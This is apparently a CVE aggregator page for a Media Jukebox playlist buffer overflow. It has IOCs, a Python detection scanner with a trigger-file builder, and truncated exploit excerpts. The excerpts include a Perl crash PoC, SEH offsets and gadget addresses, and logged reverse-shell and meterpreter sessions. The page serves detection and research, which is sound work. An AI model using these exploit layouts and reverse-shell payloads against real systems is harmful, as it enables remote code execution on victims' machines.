CVE-2009-2650
Published 2009-07-30
Priority: P3 · 47 · Critical 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code available
EPSS: 30.69% (98.0th percentile)

Heap-based buffer overflow in Sorcerer Software MultiMedia Jukebox 4.0 Build 020124 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .m3u or possibly (2) .pst file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sorcerersoftware | multimedia_jukebox | — | — |
Detection & IOCs (extracted from the indexed sources)

Byte patterns:
- \x68\x74\x74\x70\x3a\x2f\x2f (the ASCII string http:// that opens the crafted playlist entry)
- \xeb\x06\x90\x90 (a short JMP +6 over the SEH handler slot followed by two NOPs, placed in the nSEH slot)

Observations:
- The Media Jukebox 8 exploits trigger on .m3u or .pls files whose entry begins with the string 'http://' followed by roughly 262 bytes of padding before the SEH overwrite. Look for abnormally large .m3u/.pls files with this structure.
- The .pls variant requires a [playlist] header and a 'File1=http://' line to reach the overflow; monitor for malformed .pls files that carry this header followed by a large buffer.
- The SEH overwrite sits 262 bytes into the buffer: 262 'A' characters, then a short JMP in the nSEH slot and a pop/pop/ret address in the handler slot, is the exploit pattern.
- The PoC for MultiMedia Jukebox 4.0 Build 020124 writes a 5000-byte 'A' string to a .m3u file to trigger the heap overflow; large .m3u files with repetitive byte patterns are suspicious.
- The Metasploit module takes its pop/pop/ret gadget from dsp_mjMain.dll; Media Jukebox loading this DLL and then executing from unusual code paths inside it is worth monitoring.
- The 'universal' .pls SEH exploit takes its pop/pop/ret gadget from wnaspi32.dll; wnaspi32.dll being mapped into the Media Jukebox process during playlist parsing is notable.
- Bad characters the payload encoder must avoid (the null byte and common URL/path delimiters): \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x30. Padding and encoded payload bytes will contain none of these.

Caveats:
- The Metasploit module's RET addresses in dsp_mjMain.dll are version- and service-pack-specific: the XP SP3 address (0x02951457) differs from the XP SP2 address (0x02291457), so any detection keyed on these addresses depends on the target's patch level.
- The .pls exploit's 'universal' SEH gadget in wnaspi32.dll (0x1001296f) is claimed to work across Windows XP and Vista, but only because wnaspi32.dll loads at a fixed base address (no ASLR).
- The NVD entry names MultiMedia Jukebox 4.0 Build 020124, while the Exploit-DB modules target Media Jukebox 8.0.400; these are different product versions, and the CVE may apply to both or only one.
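The file layout described in the observations above, turned into a scanner as an added example that is not part of this page or of any of the indexed exploits: it parses .m3u and .pls playlists and flags entries shaped like the trigger files, covering both the Media Jukebox 8 'http://' + padding + nSEH/SEH layout and the oversized-line PoC for MultiMedia Jukebox 4.0. The byte patterns, the bad-character list and the XP SP3 pop/pop/ret address are taken from the list above; the length thresholds, the function names and the constructed sample files are assumptions made for this example.

```python
import re
import struct

# From the page's IOC list: the header the Media Jukebox 8 exploits start
# with, the short JMP that sits in the nSEH slot, and the XP SP3
# dsp_mjMain.dll pop/pop/ret address used by the Metasploit module.
HTTP_PREFIX = b"http://"
SHORT_JMP = b"\xeb\x06\x90\x90"
PPR_XP_SP3 = struct.pack("<I", 0x02951457)

# Bad characters listed for the payload encoder. A long entry that contains
# none of them after the scheme was shaped for the parser, not typed by a user.
BAD_CHARS = frozenset(
    b"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x30"
)

# Thresholds are assumptions for this example, not values from the page.
MAX_ENTRY_LEN = 1024   # longest playlist entry we consider plausible
MIN_SHAPED_LEN = 200   # a bad-char-free run this long is not a real URL

PLS_ENTRY = re.compile(rb"^File\d+=(.*)$")


def playlist_entries(data: bytes, kind: str) -> list:
    """Return the path/URL entries of an .m3u or .pls body as raw bytes."""
    lines = data.replace(b"\r\n", b"\n").split(b"\n")
    if kind == "pls":
        # The .pls exploit needs the [playlist] header and a FileN= line.
        if not any(line.strip().lower() == b"[playlist]" for line in lines):
            return []
        entries = []
        for line in lines:
            m = PLS_ENTRY.match(line)
            if m:
                entries.append(m.group(1))
        return entries
    # .m3u: every non-empty, non-comment line is an entry.
    return [line for line in lines if line and not line.startswith(b"#")]


def scan_playlist(data: bytes, kind: str) -> dict:
    """Flag playlist entries shaped like the CVE-2009-2650 trigger files."""
    result = {"suspicious": False, "reasons": [], "seh_offset": None}
    for entry in playlist_entries(data, kind):
        # Covers the MultiMedia Jukebox 4.0 PoC (5000 'A's, no http:// header).
        if len(entry) > MAX_ENTRY_LEN:
            result["reasons"].append("oversized entry (%d bytes)" % len(entry))
        if not entry.startswith(HTTP_PREFIX):
            continue
        body = entry[len(HTTP_PREFIX):]
        pos = body.find(SHORT_JMP)
        if pos != -1:
            # nSEH holds the short JMP; the 4 bytes after it are the SEH handler.
            result["seh_offset"] = pos
            result["reasons"].append("short JMP at nSEH offset %d after http://" % pos)
            if body[pos + 4:pos + 8] == PPR_XP_SP3:
                result["reasons"].append("dsp_mjMain.dll XP SP3 pop/pop/ret address")
        if len(body) >= MIN_SHAPED_LEN and not (set(body) & BAD_CHARS):
            result["reasons"].append("long http:// entry free of all payload bad chars")
    result["suspicious"] = bool(result["reasons"])
    return result


def build_sample(kind: str) -> bytes:
    """Constructed trigger file following the layout the page describes:
    http://, 262 bytes of padding, short JMP in nSEH, pop/pop/ret in SEH,
    then NOP filler standing in for a payload (no shellcode here)."""
    entry = HTTP_PREFIX + b"A" * 262 + SHORT_JMP + PPR_XP_SP3 + b"\x90" * 400
    if kind == "pls":
        return b"[playlist]\r\nFile1=" + entry + b"\r\nNumberOfEntries=1\r\n"
    return b"#EXTM3U\n" + entry + b"\n"


# Constructed benign playlist for comparison.
BENIGN_M3U = b"#EXTM3U\nhttp://radio.example/stream.mp3\n/music/track01.mp3\n"


if __name__ == "__main__":
    for label, data, kind in [
        ("crafted .m3u", build_sample("m3u"), "m3u"),
        ("crafted .pls", build_sample("pls"), "pls"),
        ("4.0 PoC .m3u", b"A" * 5000, "m3u"),
        ("benign .m3u", BENIGN_M3U, "m3u"),
    ]:
        print(label, scan_playlist(data, kind))
```

The scanner reports the nSEH offset it finds rather than hard-coding 262, so it still fires if an exploit author changes the padding; the pop/pop/ret check is only a bonus signal, since the caveats above note that the address changes with the service pack.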
No detection rules found.
Exploit-DB
Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)
exploitdb · 2009-12-27 · CVE-2009-2650
---
##
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  # File-format exploit: the module writes a crafted playlist to disk
  # rather than talking to a network service.
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Media Jukebox 8.0.400.
        By creating a specially crafted m3u or pls file, an attacker may be able
        to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ron Henry',
          'dijital1',
        ],
      'Version'        => '$Revision: 11516 $',
      'References'
Exploit-DB
Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)
exploitdb · 2009-08-31 · CVE-2009-2650
---
#!/usr/bin/python
#
# ######################################################################
#
# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)
# Author: mr_me
# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html
# Note: we needed a header to trigger this one ;)
# Tested on: Wind0ws XP and Vist@
# Greetz: offensive-security, I tried harder :)
#
# ######################################################################
#
# msf exploit(handler) > exploit
#
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Sending stage (474 bytes)
# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246)
#
# Microsoft Windows XP [Version 5.
Exploit-DB
MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)
exploitdb · 2009-07-16 · CVE-2009-2650
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
use strict;
use warnings;

# 5000 bytes of 'A' (0x41): far longer than any playlist entry the player expects,
# enough to overflow the heap buffer and crash it.
my $crash = "\x41" x 5000;

# Write the trigger file; open it in MultiMedia Jukebox 4.0 to reproduce the crash.
open(my $fh, '>', 'hack4love.m3u') or die "cannot write hack4love.m3u: $!";
print $fh $crash;
close($fh);
########################################################################################
# milw0rm.com [2009-07-16]
Exploit-DB
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
exploitdb · 2009-05-07 · CVE-2009-1675
This entry is indexed against CVE-2009-1675 (32bit FTP), a different vulnerability; it is unrelated to Media Jukebox and CVE-2009-2650.
---
#msf > use exploit/windows/ftp/32bitftp_pasv_reply
#msf exploit(32bitftp_pasv) > set PAYLOAD windows/meterpreter/reverse_tcp
#PAYLOAD => windows/meterpreter/reverse_tcp
#msf exploit(32bitftp_pasv) > set LHOST 192.168.1.2
#LHOST => 192.168.1.2
#msf exploit(32bitftp_pasv) > exploit
#[*] Exploit running as background job.
#msf exploit(32bitftp_pasv) >
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Server started.
# Victim connecting to the malicious ftp server.
#[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
#[*] Sending stage (2650 bytes)
#[*] Sleeping before handling stage...
#[*] Uploading DLL (75787 bytes)...
#[*] Upload completed.
#[*] Meterpreter session 1 opened (192.168
Metasploit
Media Jukebox 8.0.400 Buffer Overflow (SEH)
metasploit
This module exploits a stack buffer overflow in Media Jukebox 8.0.400 by creating a specially crafted m3u or pls file.

Writeups & analysis
No writeups or analysis indexed.

Published 2009-07-30